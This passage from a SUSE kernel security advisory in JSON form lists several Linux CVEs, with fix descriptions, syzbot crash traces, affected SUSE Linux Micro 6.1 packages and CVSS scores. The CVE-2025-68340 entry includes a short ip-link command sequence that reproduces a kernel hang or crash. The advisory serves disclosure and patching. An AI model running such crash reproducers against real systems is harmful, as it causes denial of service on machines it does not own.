unlikely.)\n\nChange the driver to do the PNP driver registration at module init time,\nand the unregistration at module exit time. Since `c6xdigio_detach()`\nnow only calls `comedi_legacy_detach()`, remove the function and change\nthe Comedi driver \"detach\" handler to `comedi_legacy_detach`.\n\n-------------------------------------------\n[1] Syzbot sample crash report:\nUnexpected driver unregister!\nWARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister drivers/base/driver.c:273 [inline]\nWARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister+0x90/0xb0 drivers/base/driver.c:270\nModules linked in:\nCPU: 0 UID: 0 PID: 5970 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nRIP: 0010:driver_unregister drivers/base/driver.c:273 [inline]\nRIP: 0010:driver_unregister+0x90/0xb0 drivers/base/driver.c:270\nCode: 48 89 ef e8 c2 e6 82 fc 48 89 df e8 3a 93 ff ff 5b 5d e9 c3 6d d9 fb e8 be 6d d9 fb 90 48 c7 c7 e0 f8 1f 8c e8 51 a2 97 fb 90 \u003c0f\u003e 0b 90 90 5b 5d e9 a5 6d d9 fb e8 e0 f4 41 fc eb 94 e8 d9 f4 41\nRSP: 0018:ffffc9000373f9a0 EFLAGS: 00010282\nRAX: 0000000000000000 RBX: ffffffff8ff24720 RCX: ffffffff817b6ee8\nRDX: ffff88807c932480 RSI: ffffffff817b6ef5 RDI: 0000000000000001\nRBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000\nR10: 0000000000000001 R11: 0000000000000001 R12: ffffffff8ff24660\nR13: dffffc0000000000 R14: 0000000000000000 R15: ffff88814cca0000\nFS: 000055556dab1500(0000) GS:ffff8881249d9000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000055f77f285cd0 CR3: 000000007d871000 CR4: 00000000003526f0\nCall Trace:\n \u003cTASK\u003e\n comedi_device_detach_locked+0x12f/0xa50 drivers/comedi/drivers.c:207\n comedi_device_detach+0x67/0xb0 drivers/comedi/drivers.c:215\n comedi_device_attach+0x43d/0x900 drivers/comedi/drivers.c:1011\n do_devconfig_ioctl+0x1b1/0x710 drivers/comedi/comedi_fops.c:872\n comedi_unlocked_ioctl+0x165d/0x2f00 drivers/comedi/comedi_fops.c:2178\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_sys\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68332",
"url": "https://www.suse.com/security/cve/CVE-2025-68332"
},
{
"category": "external",
"summary": "SUSE Bug 1255483 for CVE-2025-68332",
"url": "https://bugzilla.suse.com/1255483"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68332"
},
{
"cve": "CVE-2025-68335",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68335"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: pcl818: fix null-ptr-deref in pcl818_ai_cancel()\n\nSyzbot identified an issue [1] in pcl818_ai_cancel(), which stems from\nthe fact that in case of early device detach via pcl818_detach(),\nsubdevice dev-\u003eread_subdev may not have initialized its pointer to\n\u0026struct comedi_async as intended. Thus, any such dereferencing of\n\u0026s-\u003easync-\u003ecmd will lead to general protection fault and kernel crash.\n\nMitigate this problem by removing a call to pcl818_ai_cancel() from\npcl818_detach() altogether. This way, if the subdevice setups its\nsupport for async commands, everything async-related will be\nhandled via subdevice\u0027s own -\u003ecancel() function in\ncomedi_device_detach_locked() even before pcl818_detach(). If no\nsupport for asynchronous commands is provided, there is no need\nto cancel anything either.\n\n[1] Syzbot crash:\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000005: 0000 [#1] SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f]\nCPU: 1 UID: 0 PID: 6050 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025\nRIP: 0010:pcl818_ai_cancel+0x69/0x3f0 drivers/comedi/drivers/pcl818.c:762\n...\nCall Trace:\n \u003cTASK\u003e\n pcl818_detach+0x66/0xd0 drivers/comedi/drivers/pcl818.c:1115\n comedi_device_detach_locked+0x178/0x750 drivers/comedi/drivers.c:207\n do_devconfig_ioctl drivers/comedi/comedi_fops.c:848 [inline]\n comedi_unlocked_ioctl+0xcde/0x1020 drivers/comedi/comedi_fops.c:2178\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68335",
"url": "https://www.suse.com/security/cve/CVE-2025-68335"
},
{
"category": "external",
"summary": "SUSE Bug 1255480 for CVE-2025-68335",
"url": "https://bugzilla.suse.com/1255480"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68335"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68339",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68339"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\natm/fore200e: Fix possible data race in fore200e_open()\n\nProtect access to fore200e-\u003eavailable_cell_rate with rate_mtx lock in the\nerror handling path of fore200e_open() to prevent a data race.\n\nThe field fore200e-\u003eavailable_cell_rate is a shared resource used to track\navailable bandwidth. It is concurrently accessed by fore200e_open(),\nfore200e_close(), and fore200e_change_qos().\n\nIn fore200e_open(), the lock rate_mtx is correctly held when subtracting\nvcc-\u003eqos.txtp.max_pcr from available_cell_rate to reserve bandwidth.\nHowever, if the subsequent call to fore200e_activate_vcin() fails, the\nfunction restores the reserved bandwidth by adding back to\navailable_cell_rate without holding the lock.\n\nThis introduces a race condition because available_cell_rate is a global\ndevice resource shared across all VCCs. If the error path in\nfore200e_open() executes concurrently with operations like\nfore200e_close() or fore200e_change_qos() on other VCCs, a\nread-modify-write race occurs.\n\nSpecifically, the error path reads the rate without the lock. If another\nCPU acquires the lock and modifies the rate (e.g., releasing bandwidth in\nfore200e_close()) between this read and the subsequent write, the error\npath will overwrite the concurrent update with a stale value. This results\nin incorrect bandwidth accounting.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68339",
"url": "https://www.suse.com/security/cve/CVE-2025-68339"
},
{
"category": "external",
"summary": "SUSE Bug 1255505 for CVE-2025-68339",
"url": "https://bugzilla.suse.com/1255505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68339"
},
{
"cve": "CVE-2025-68340",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68340"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: Move team device type change at the end of team_port_add\n\nAttempting to add a port device that is already up will expectedly fail,\nbut not before modifying the team device header_ops.\n\nIn the case of the syzbot reproducer the gre0 device is\nalready in state UP when it attempts to add it as a\nport device of team0, this fails but before that\nheader_ops-\u003ecreate of team0 is changed from eth_header to ipgre_header\nin the call to team_dev_type_check_change.\n\nLater when we end up in ipgre_header() struct ip_tunnel* points to nonsense\nas the private data of the device still holds a struct team.\n\nExample sequence of iproute2 commands to reproduce the hang/BUG():\nip link add dev team0 type team\nip link add dev gre0 type gre\nip link set dev gre0 up\nip link set dev gre0 master team0\nip link set dev team0 up\nping -I team0 1.1.1.1\n\nMove team_dev_type_check_change down where all other checks have passed\nas it changes the dev type with no way to restore it in case\none of the checks that follow it fail.\n\nAlso make sure to preserve the origial mtu assignment:\n - If port_dev is not the same type as dev, dev takes mtu from port_dev\n - If port_dev is the same type as dev, port_dev takes mtu from dev\n\nThis is done by adding a conditional before the call to dev_set_mtu\nto prevent it from assigning port_dev-\u003emtu = dev-\u003emtu and instead\nletting team_dev_type_check_change assign dev-\u003emtu = port_dev-\u003emtu.\nThe conditional is needed because the patch moves the call to\nteam_dev_type_check_change past dev_set_mtu.\n\nTesting:\n - team device driver in-tree selftests\n - Add/remove various devices as slaves of team device\n - syzbot",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
